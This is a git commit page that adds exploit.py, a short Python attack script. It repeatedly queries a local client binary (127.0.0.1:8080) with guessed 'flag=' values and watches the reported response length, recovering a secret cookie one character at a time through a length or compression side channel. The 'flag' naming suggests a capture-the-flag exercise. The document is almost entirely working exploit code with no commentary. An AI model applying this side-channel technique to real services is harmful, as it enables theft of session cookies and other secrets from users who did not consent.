Add exploit script
This commit is contained in:
29
exploit.py
Normal file
29
exploit.py
Normal file
@@ -0,0 +1,29 @@
|
|||||||
|
from string import ascii_lowercase, ascii_uppercase, digits
|
||||||
|
from subprocess import check_output
|
||||||
|
|
||||||
|
alphabet = ascii_lowercase + ascii_uppercase + digits
|
||||||
|
env = {
|
||||||
|
"LD_PRELOAD": "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
def request(url: str) -> int:
|
||||||
|
"""Executes the client binary with the following URL, and checks its output."""
|
||||||
|
out = check_output(["./client", "127.0.0.1", "8080", url], env=env).decode('utf-8')
|
||||||
|
return int(out.split(' ')[1])
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
cookie = ''
|
||||||
|
best_len = request('flag=' + cookie)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in alphabet:
|
||||||
|
current = request('flag=' + cookie + c)
|
||||||
|
if current <= best_len:
|
||||||
|
cookie += c
|
||||||
|
best_len = current
|
||||||
|
print(f'Found one byte in cookie: {cookie}')
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
print(f'Found complete cookie: {cookie}')
|
||||||
|
break
|
||||||
Reference in New Issue
Block a user